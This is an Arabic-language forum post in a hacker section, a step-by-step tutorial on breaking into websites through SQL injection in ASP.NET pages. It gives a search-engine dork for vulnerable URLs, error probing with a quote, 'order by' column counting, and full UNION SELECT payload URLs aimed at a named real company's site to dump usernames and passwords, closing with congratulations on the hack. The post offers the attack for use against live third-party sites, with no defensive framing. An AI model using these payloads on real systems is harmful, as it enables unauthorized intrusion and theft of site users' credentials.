منتديات القناوص
اهلاً وسهلاً بك زائرنا الكريم ؛ اذ كانت هذ زيارتك الاولى للمنتديات الـقناوص؛
يرجى التكريم بزيارة صفحة التسجيل اذى رغبت بالمشاركة في المنتدى
اما اذ ا رغبت بقراءة المواضيع والإطلع فتـفـضل بزيارة القسم الذي ترغب ادنا

مرحباَ بكل زوار منتــــــــــــــــــديـــات الــــــــــــــــقــــــناوص

منتديات القناوص

هنا يخفق القلب ويسطر القلم اجمل العبارات...منتديات القناوص ترحب بكم....معنى الإبداع صنع الشيء المستحيل ونحن نصنع المستحيل ..(المقلدون خلفنا دائماً) من قلدنا أكد لنا بأننا الأفضل
 
الرئيسيةبوابة منتديات االيوميةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخولمواقع صحف عربيةقنوات بث مباشرالمكتببةمواقع صحف اخبارية
عرض اوقات الصلاه لمدينه القناوص...الفجر: 4:18-شروق الشمس: 5:37-الظهر: 12:04-العصر: 3:21-المغرب: 6:31-العشاء: 8:01
تسجيل صفحاتك المفضلة في مواقع خارجية
تسجيل صفحاتك المفضلة في مواقع خارجية digg  تسجيل صفحاتك المفضلة في مواقع خارجية delicious  تسجيل صفحاتك المفضلة في مواقع خارجية reddit  تسجيل صفحاتك المفضلة في مواقع خارجية stumbleupon  تسجيل صفحاتك المفضلة في مواقع خارجية slashdot  تسجيل صفحاتك المفضلة في مواقع خارجية yahoo  تسجيل صفحاتك المفضلة في مواقع خارجية google  تسجيل صفحاتك المفضلة في مواقع خارجية blogmarks  تسجيل صفحاتك المفضلة في مواقع خارجية live      

قم بحفض و مشاطرة الرابط منتدى القناوص على موقع حفض الصفحات

قم بحفض و مشاطرة الرابط منتديات القناوص على موقع حفض الصفحات
تصويت
ما رأيكم بالمنتدى بشكل عام ؟
 ممتاز
 جيد
 متوسط
 يحتاج لتطوير
استعرض النتائج
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم

شاطر | 
 

 اختراق المواقع بثغره SQL injection [الفصل الثاني]

اذهب الى الأسفل 
كاتب الموضوعرسالة
المديرالعام
Admin
avatar

عدد المساهمات : 436
نقاط : 1255
تاريخ التسجيل : 16/10/2010
العمر : 28
الموقع : القناوص

مُساهمةموضوع: اختراق المواقع بثغره SQL injection [الفصل الثاني]   الأحد ديسمبر 12, 2010 5:59 pm


بســم الله الـرحمـ ـن الـرحـيـم
ألسلآم عليكـ ـم أعـضـآء قــوـآت الهـكــر العــربـيـ ـه
أعذـرونـي على الإنقـطـاع والتقصيــر إلــي حصــل في الفـتـره الآخـيــره صدقونـي لدـوآعي المرض [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
عــلـى العمـوم مو موضـوعـنــآء اليــوم تــآبـع للدرس الســآبق ثغـرات SQL [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بس اليـوم رح يكـون التطبيـــق سهل سهل سهل جدـا وصدقونـي مـارح تلاقـوا اسهـل مـن هـا الشــرح فـي ـآي منتـ ـدـى ـآخـ ـر [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طبعـا مـارح اشرح اليوم تحـت بيـه الــphp
لأ رح يكـون الشـرح اليوم أن شـآء الله على ثغرأت ملفـات الـ aspx

نبـدـآ على بركه الله
بالأول رح دور على الثغـره هذه في العـم جـوجـ ـل
كود PHP:
show_news_details.aspx?id="



هذه هي اسهـل ثغـره على تطبق عليهـا
المهـم خلونـا نشــرح الثغـره
show_news_details.aspx الملـف المصــآب
id المتغيـر

طيـب أنـا رح أطبــ ـق الثغـ ـ ـره على مـوقـع شركه السلطـآن وخلـف للتجـآره [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
المهـم بعـد مـا تخـتـآر موقـع مصــآب بثغـره ضيف علامـه أستعلآم للتـآكد من وجود الثغـ ـره
إمـا ان تضيف هذه /* أو '

طيب لاحـظ ضهـور الخطــآء


[ندعوك
للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


طيــب جميــل جـدـا
الحيـن تـآكدنـا من وجود ثغـره
طيب حلو جميـل الان نضيف امر استعلام الجـآدول المصابه
كود PHP:
order+by


يعنـي رح يصير الرابط هيك
كود PHP:
http://www.sultan-khalaf.com/show_news_details.aspx?id=1+order+by+1




طبعا مع تغيـر رقم 1 إلى ان تصل إلى العمـود المصاب

طيب الآن نسوي أمـر التحقــق من الأعمـده المصـآبه بدقه ولا تنسـو نضيف قبل المتغيـر إشـاره السـآلب -
كود PHP:
+union+select+



يعنـي رح يصير الرابط هيـكـ
كود PHP:
http://www.sultan-khalaf.com/show_news_details.aspx?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users



ملاحظـه طبعــآ في هذه الثغره لا زم تضيف بعد الاعمـده +from+users
هذا يعني انه رح يتحقق من جدول الـ users
يعني كل ما تغيرت الثغره كل ما تغير حـاجـات كتيـره

شوف الصوره

[ندعوك
للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


خلآص وصنـا للنهـآيه
طلـع معـايا 2 و 5 الاعمـده المصابه
طيب خلآص الحيـن تغير العمود رقم 2 بكلمه username
والعمــود رقم 5 بكلمه password
طيب شوف كيف رح يصير الرـآبـط
كود PHP:
http://www.sultan-khalaf.com/show_news_details.aspx?id=-1+union+select+1,username,3,4,password,6,7,8,9+from+users



وشوف الصـوره
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][/url][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][/url][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

مبــروكـ عليـكـ الإختــرآق [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



المصدر: منتديات القناوص -http://alguenaos.yoo7.com





____التوقيع_______

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://www.alguenaos.yoo7.com
 
اختراق المواقع بثغره SQL injection [الفصل الثاني]
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» boilers by hager mandour

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات القناوص :: ҈҉Ҳ‾ˉ−ـ‗_ منتدى الهاكر _‗ـ−ˉ‾Ҳ҉҈-
انتقل الى: